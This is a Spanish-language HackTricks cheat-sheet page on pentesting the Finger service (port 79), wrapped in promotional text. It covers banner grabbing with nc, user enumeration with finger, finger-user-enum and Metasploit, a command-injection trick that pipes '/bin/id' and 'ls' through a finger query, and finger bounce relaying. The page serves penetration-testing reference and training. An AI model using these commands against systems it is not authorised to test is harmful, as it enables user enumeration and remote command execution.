mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-23 05:03:35 +00:00
3.9 KiB
3.9 KiB
79 - Pentesting Finger
Aprende hacking en AWS de cero a héroe con htARTE (HackTricks AWS Red Team Expert)!
Otras formas de apoyar a HackTricks:
- Si quieres ver tu empresa anunciada en HackTricks o descargar HackTricks en PDF, consulta los PLANES DE SUSCRIPCIÓN!
- Consigue el merchandising oficial de PEASS & HackTricks
- Descubre La Familia PEASS, nuestra colección de NFTs exclusivos
- Únete al 💬 grupo de Discord o al grupo de Telegram o sigue a Twitter 🐦 @carlospolopm.
- Comparte tus trucos de hacking enviando PRs a los repositorios de github de HackTricks y HackTricks Cloud.
Información Básica
Finger es un programa que puedes usar para encontrar información sobre usuarios de computadoras. Generalmente lista el nombre de inicio de sesión, el nombre completo y posiblemente otros detalles sobre el usuario que estás investigando. Estos detalles pueden incluir la ubicación de la oficina y el número de teléfono (si se conocen), tiempo de inicio de sesión, tiempo de inactividad, cuándo se leyó el correo por última vez, y los archivos de plan y proyecto del usuario.
Puerto predeterminado: 79
PORT STATE SERVICE
79/tcp open finger
Enumeración
Obtención de Banner/Conexión Básica
nc -vn <IP> 79
echo "root" | nc -vn <IP> 79
Enumeración de usuarios
finger @<Victim> #List users
finger admin@<Victim> #Get info of user
finger user@<Victim> #Get info of user
Alternativamente, puedes usar finger-user-enum de pentestmonkey, algunos ejemplos:
finger-user-enum.pl -U users.txt -t 10.0.0.1
finger-user-enum.pl -u root -t 10.0.0.1
finger-user-enum.pl -U users.txt -T ips.txt
Nmap ejecuta un script para hacerlo usando scripts predeterminados
Metasploit utiliza más trucos que Nmap
use auxiliary/scanner/finger/finger_users
Shodan
port:79 USER
Ejecución de comandos
finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"
Rebote de Finger
Usar un sistema como un relevo de finger
finger user@host@victim
finger @internal@external
Aprende hacking en AWS de cero a héroe con htARTE (HackTricks AWS Red Team Expert)!
Otras formas de apoyar a HackTricks:
- Si quieres ver a tu empresa anunciada en HackTricks o descargar HackTricks en PDF revisa los PLANES DE SUSCRIPCIÓN!
- Consigue el merchandising oficial de PEASS & HackTricks
- Descubre La Familia PEASS, nuestra colección de NFTs exclusivos
- Únete al 💬 grupo de Discord o al grupo de telegram o sigueme en Twitter 🐦 @carlospolopm.
- Comparte tus trucos de hacking enviando PRs a los repositorios de github de HackTricks y HackTricks Cloud.